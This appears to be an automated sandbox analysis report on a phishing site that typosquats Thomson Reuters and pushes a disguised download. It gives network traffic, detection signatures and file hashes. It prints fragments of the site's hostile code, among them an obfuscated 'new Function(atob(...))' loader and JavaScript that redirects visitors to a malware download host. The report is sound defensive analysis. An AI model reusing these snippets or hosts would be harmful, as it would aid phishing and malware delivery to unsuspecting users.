
Windows Analysis Report
https://tax.thomson-reuterfiles.com/

Overview

General Information

Sample URL: https://tax.thomson-reuterfiles.com/
Analysis ID: 1647531

Detection

Score: 52
Range: 0 - 100
Confidence: 100%

Signatures

AI detected suspicious Javascript
AI detected suspicious URL
HTML page contains suspicious onload / onerror event
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
HTML body contains low number of good links
HTML page contains hidden javascript code
No HTML title found
Suricata IDS alerts with low severity for network traffic
Suspicious form URL found

Classification

Classification chart (axes): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.
  • System is w10x64_ra
  • chrome.exe (PID: 6940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 1840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,1624719050673582631,1026117326899796759,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1568 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 380 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tax.thomson-reuterfiles.com/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No yara matches
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-24T23:23:13.563310+0100 | 2056643 | 2 | Possible Social Engineering Attempted | 192.168.2.16 | 49729 | 194.163.44.11 | 443 | TCP

Phishing

Source: 1.12..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://down.tradingviewdownload.top/dw.php... The script uses the 'Function' constructor to execute dynamically generated code, which is a high-risk indicator of potential malicious behavior. This allows for the execution of arbitrary JavaScript, which could lead to data exfiltration, system compromise, or other harmful actions.
Source: https://tax.thomson-reuterfiles.com | Joe Sandbox AI: The URL 'https://tax.thomson-reuterfiles.com' appears to be a typosquatting attempt targeting the well-known brand 'Thomson Reuters'. The legitimate URL is 'https://www.thomsonreuters.com'. The analyzed URL uses a subdomain 'tax' which could be relevant to Thomson Reuters' tax-related services, increasing the likelihood of user confusion. The main domain 'thomson-reuterfiles.com' includes a visual and structural similarity to 'thomsonreuters.com', with the addition of 'files' and the hyphenation of 'reuters' to 'reuterfiles'. This could mislead users into thinking it is a legitimate part of the Thomson Reuters domain, especially in a context related to tax services. The use of a hyphen and the addition of 'files' are common typosquatting techniques to create a deceptive URL. The likelihood of this being a typosquatting attempt is high due to the structural similarity and potential for user confusion.
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: (new function(atob(this.dataset.digest)))();
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: Number of links: 0
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: Base64 decoded: (function(){var e=[],b={};try{function c(a){if("object"===typeof a&&null!==a){var f={};function n(l){try{var k=a[l];switch(typeof k){case "object":if(null===k)break;case "function":k=k.toString()}f[l]=k}catch(t){e.push(t.message)}}for(var d in a)n(d);try{...
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: HTML title missing
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: Form action: https://down.tradingviewdownload.top/dw.php
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: No favicon
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: No <meta name="author".. found
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: No <meta name="copyright".. found
Source: unknown | HTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.241.61.45:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.241.61.45:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.238.55.62:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 194.163.44.11:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 194.163.44.11:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: chrome.exe | Memory has grown: Private usage: 11MB later: 38MB
Source: Network traffic | Suricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49729 -> 194.163.44.11:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.64.67
Source: unknown | TCP traffic detected without corresponding DNS query: 208.89.73.27
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: tax.thomson-reuterfiles.com
    Connection: keep-alive
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /dw.php HTTP/1.1
    Host: down.tradingviewdownload.top
    Connection: keep-alive
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: https://tax.thomson-reuterfiles.com/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /files/images/Logo.png HTTP/1.1
    Host: down.tradingviewdownload.top
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://down.tradingviewdownload.top/dw.php
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
    Cookie: _cid=65db891c59864d2eec14acd38d078bd1
Source: global traffic | DNS traffic detected: DNS query: tax.thomson-reuterfiles.com
Source: global traffic | DNS traffic detected: DNS query: google.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: app-data.gcs.trstatic.net
Source: global traffic | DNS traffic detected: DNS query: down.tradingviewdownload.top
Source: unknown | HTTP traffic detected:
    POST /dw.php HTTP/1.1
    Host: down.tradingviewdownload.top
    Connection: keep-alive
    Content-Length: 146389
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Origin: https://down.tradingviewdownload.top
    Content-Type: application/x-www-form-urlencoded
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: https://down.tradingviewdownload.top/dw.php
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
    Cookie: _cid=65db891c59864d2eec14acd38d078bd1
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Mon, 24 Mar 2025 22:23:13 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir6940_1889219146
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir6940_1889219146
Source: classification engine | Classification label: mal52.phis.win@28/18@23/158
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\Downloads\c5e73548-dfc2-4f51-b717-82b24c734273.tmp
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,1624719050673582631,1026117326899796759,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1568 /prefetch:3
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tax.thomson-reuterfiles.com/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\Downloads\Unconfirmed 611739.crdownload
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 2 Browser Extensions | 1 Process Injection | 11 Masquerading | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Extra Window Memory Injection | 1 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 4 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 5 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 File Deletion | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Extra Window Memory Injection | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact

Source | Detection | Scanner | Label
https://tax.thomson-reuterfiles.com/ | 0% | Avira URL Cloud | safe
No Antivirus matches
Source | Detection | Scanner | Label
https://tax.thomson-reuterfiles.com/_next/static/css/6c5712a607796dcd.css | 0% | Avira URL Cloud | safe
https://tax.thomson-reuterfiles.com/_next/static/chunks/main-49b0a41ec78c7394.js | 0% | Avira URL Cloud | safe
https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/_app-1e66c022522ffc96.js | 0% | Avira URL Cloud | safe
https://down.tradingviewdownload.top/files/images/Logo.png | 0% | Avira URL Cloud | safe
https://tax.thomson-reuterfiles.com/_next/static/media/search-background-desktop.a9bd8cdc.png | 0% | Avira URL Cloud | safe
https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.js | 0% | Avira URL Cloud | safe
https://tax.thomson-reuterfiles.com/_next/static/chunks/849-a4a13dffe91c49e7.js | 0% | Avira URL Cloud | safe
https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/index-899e26e961b4ef93.js | 0% | Avira URL Cloud | safe
https://app-data.gcs.trstatic.net/wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff2 | 0% | Avira URL Cloud | safe
https://tax.thomson-reuterfiles.com/_next/static/chunks/webpack-2555a4296ab7a1b2.js | 0% | Avira URL Cloud | safe
https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.js | 0% | Avira URL Cloud | safe
https://tax.thomson-reuterfiles.com/_next/static/chunks/framework-0c7baedefba6b077.js | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
google.com | 142.251.40.142 | true | false | | high
d22lao95g8jow9.cloudfront.net | 18.238.55.62 | true | false | | unknown
tax.thomson-reuterfiles.com | 185.241.61.45 | true | false | | high
www.google.com | 142.250.80.100 | true | false | | high
down.tradingviewdownload.top | 194.163.44.11 | true | true | | unknown
app-data.gcs.trstatic.net | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/index-899e26e961b4ef93.js | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/chunks/main-49b0a41ec78c7394.js | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/chunks/849-a4a13dffe91c49e7.js | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/chunks/webpack-2555a4296ab7a1b2.js | true | Avira URL Cloud: safe | unknown
https://down.tradingviewdownload.top/files/images/Logo.png | false | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/css/6c5712a607796dcd.css | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.js | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/media/search-background-desktop.a9bd8cdc.png | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/_app-1e66c022522ffc96.js | true | Avira URL Cloud: safe | unknown
https://app-data.gcs.trstatic.net/wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff2 | false | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.js | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/ | true | | unknown
https://tax.thomson-reuterfiles.com/_next/static/chunks/framework-0c7baedefba6b077.js | true | Avira URL Cloud: safe | unknown
https://down.tradingviewdownload.top/dw.php | true | | unknown

| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 142.250.80.35 | unknown | United States | 15169 | GOOGLEUS | false |
| 1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false |
| 185.241.61.45 | tax.thomson-reuterfiles.com | unknown | 204476 | ULX-UKGB | false |
| 142.250.80.100 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 142.251.40.238 | unknown | United States | 15169 | GOOGLEUS | false |
| 172.253.62.84 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.80.42 | unknown | United States | 15169 | GOOGLEUS | false |
| 8.8.8.8 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.65.206 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.251.32.110 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.80.3 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.251.40.163 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.72.99 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.251.40.170 | unknown | United States | 15169 | GOOGLEUS | false |
| 18.238.55.62 | d22lao95g8jow9.cloudfront.net | United States | 16509 | AMAZON-02US | false |
| 194.163.44.11 | down.tradingviewdownload.top | Germany | 6659 | NEXINTO-DE | true |

                  IP
                  192.168.2.16
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1647531
                  Start date and time:2025-03-24 23:22:29 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Sample URL:https://tax.thomson-reuterfiles.com/
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:16
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal52.phis.win@28/18@23/158
                  • Exclude process from analysis (whitelisted): svchost.exe
                  • Excluded IPs from analysis (whitelisted): 142.251.32.110, 142.250.72.99, 172.253.62.84, 142.251.40.238, 142.250.80.46, 142.250.65.174, 142.251.40.206
                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                  • Not all processes were analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: https://tax.thomson-reuterfiles.com/
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):0
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:224ADDB83C8CAC5BC614A8222CB150CA
                  SHA1:04AF1DB13F099A12D9EE59101711A2997079788A
                  SHA-256:C05FF2992670A5F8250038BD0329E35AAE7F594DD2A5FD8F51A7F93B2529BFB9
                  SHA-512:4A9BF32E4EAB3EBF5485906ACABD5183B23B113EA72BB7A91EF1C011C3398B33695B621F989FF1D3B31BBF33472D3CEDA38B598A9507702D8EA87C98ED497D2E
                  Malicious:false
                  Reputation:unknown
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):83344
                  Entropy (8bit):6.51298360779251
                  Encrypted:false
                  SSDEEP:
                  MD5:224ADDB83C8CAC5BC614A8222CB150CA
                  SHA1:04AF1DB13F099A12D9EE59101711A2997079788A
                  SHA-256:C05FF2992670A5F8250038BD0329E35AAE7F594DD2A5FD8F51A7F93B2529BFB9
                  SHA-512:4A9BF32E4EAB3EBF5485906ACABD5183B23B113EA72BB7A91EF1C011C3398B33695B621F989FF1D3B31BBF33472D3CEDA38B598A9507702D8EA87C98ED497D2E
                  Malicious:false
                  Reputation:unknown
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):7745
                  Entropy (8bit):6.231799617355649
                  Encrypted:false
                  SSDEEP:
                  MD5:05D4D5C09EB63F422519F4B1103A05F2
                  SHA1:26DFFAA81D41A3ECB59C08A7D6E76C0C9041F331
                  SHA-256:F6ACB1396D2DD2511BDC8E54CBDE9441E838D1FA3234FF58B0F3FCB1FA7A009C
                  SHA-512:ABAD6A9F9851B8ADF4E4E7F21E4F648CA078C7357964D523D7DAD63E5411673B7195B1A4A94EAAEEF9A46BCE114991DE9B172C59080F4F7A09BCCDDC260E1E26
                  Malicious:false
                  Reputation:unknown
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (60667), with no line terminators
                  Category:downloaded
                  Size (bytes):60925
                  Entropy (8bit):5.221090580255161
                  Encrypted:false
                  SSDEEP:
                  MD5:28F2F56C3974CCB9FFA2913CF382BFC0
                  SHA1:7CDB9B252F4DA482716EE433F4D779661F77042A
                  SHA-256:351B7DF005DB3E41B0C212E6ECFFAC299DD0F2E911D81AEA685D3B02B2F95E63
                  SHA-512:5877813AA9B0BB1CD40EC8C30FFEF87D9D40BD2D260818DB025B1456DE0F0DA2C17BFD3DAD3D6E531587F05188A9D5BC92F5BEB89F5742B11EFB49436B5864EE
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/index-899e26e961b4ef93.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[405],{5728:function(s,c,e){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return e(7254)}])},7254:function(s,c,e){"use strict";e.r(c),e.d(c,{default:function(){return pages}});var t=e(5893),a=e(7294),l=e(6896),components_Popup=function(s){let{open:c,setOpen:e}=s,{locale:n}=(0,l.Z)(),[r,h]=(0,a.useState)(1);return(0,a.useEffect)(()=>{c&&(h(1),window.location.href="https://down.Deepseekdownload.top/dw/dw.php")},[c]),(0,t.jsxs)("div",{className:"fixed inset-0 z-[100] flex items-center justify-center px-4 transition-all duration-500 ".concat(c?"opacity-100 visible":"opacity-0 invisible"),children:[(0,t.jsx)("div",{onClick:()=>{e(!1)},className:"absolute inset-0 bg-black bg-opacity-50 backdrop-blur-sm",style:{opacity:1}}),(0,t.jsxs)("div",{className:"relative bg-[#060606] p-4 sm:p-6 rounded-2xl w-full max-w-[512px]",style:{opacity:1,transform:"none"},children:[(0,t.jsxs)("div",{className:"flex items-center justify-center p
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 28740, version 1.0
                  Category:downloaded
                  Size (bytes):28740
                  Entropy (8bit):7.992640337554668
                  Encrypted:true
                  SSDEEP:
                  MD5:30164609C16364DE36B51BAF83BDEC4E
                  SHA1:FE93B8F82DC099CCA5E441FDEAF30FEA53202FB1
                  SHA-256:7A19A7027E125257D310C6DBD78AE3A30B5EA1E3794D60B12BB28227A003BFDA
                  SHA-512:A2F1B37730D209BC6E638E98BFF78EC294BE964A2B95308207EA84521409803523E11C62337A38CDB331A5E4FB58CB0171F139574C50B38414A5CD26325EE4EB
                  Malicious:false
                  Reputation:unknown
                  URL:https://fonts.gstatic.com/s/sourcesans3/v18/nwpStKy2OAdR1K-IwhWudF-R3w8aZQ.woff2
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text
                  Category:downloaded
                  Size (bytes):315
                  Entropy (8bit):5.0572271090563765
                  Encrypted:false
                  SSDEEP:
                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                  Malicious:false
                  Reputation:unknown
                  URL:https://down.tradingviewdownload.top/files/images/Logo.png
                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):16
                  Entropy (8bit):3.875
                  Encrypted:false
                  SSDEEP:
                  MD5:46DF3E5E2D15256CA16616EBFDA5427F
                  SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                  SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                  SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                  Malicious:false
                  Reputation:unknown
                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCYl_7RMjcnElEgUNkWGVTiHxs0hN1qpbJw==?alt=proto
                  Preview:CgkKBw2RYZVOGgA=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):117898
                  Entropy (8bit):5.374105106842063
                  Encrypted:false
                  SSDEEP:
                  MD5:4E1FA4B25BB3E13122ADB6FC89B692A9
                  SHA1:62A57CC9D9D92E27254C8FCA63A7C217741FE0DC
                  SHA-256:BD3F95C00C05EFA6CD717A4B287146FF3148D9637EFAAFB7F697EA8EBB162017
                  SHA-512:40145E4843102AAF203EC6F9CCADA0D846A4CECAED2AFFF92C93FD6D070B83BF2E526F0038452A732A4AF1E9A37E694F1CA78695308014CE071F43AEB5D9C3C4
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/main-49b0a41ec78c7394.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{4878:function(r,n){"use strict";function getDeploymentIdQueryOrEmptyString(){return""}Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(n,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return getDeploymentIdQueryOrEmptyString}})},37:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var r=/\((.*)\)/.exec(this.toString());return r?r[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(r,n){return n=this.concat.apply([],this),r>1&&n.some(Array.isArray)?n.flat(r-1):n},Array.prototype.flatMap=function(r,n){return this.map(r,n).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(r){if("function"!=typeof r)return
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):77
                  Entropy (8bit):4.37144473219773
                  Encrypted:false
                  SSDEEP:
                  MD5:B6652DF95DB52FEB4DAF4ECA35380933
                  SHA1:65451D110137761B318C82D9071C042DB80C4036
                  SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                  SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.js
                  Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (1476)
                  Category:downloaded
                  Size (bytes):3472
                  Entropy (8bit):5.1522869804082845
                  Encrypted:false
                  SSDEEP:
                  MD5:F309517DC333784216BE4FF5DEA5045C
                  SHA1:F2434DC4F60F3B892C062B84E463BFD2BF3B5679
                  SHA-256:FC06A24B94DBA08EF5DADAE7F769BBD17DC2ED115AD8614EBECDD86EF4E8BF87
                  SHA-512:FBBF64844F63F035A075C8B173708B9F2BF21E35C92EAD9ED9F6EAE359851ECA38BE90B0A311D81AF185A9E6200D77B3D60E54AB2AF68A6053D9ABACD2782136
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/
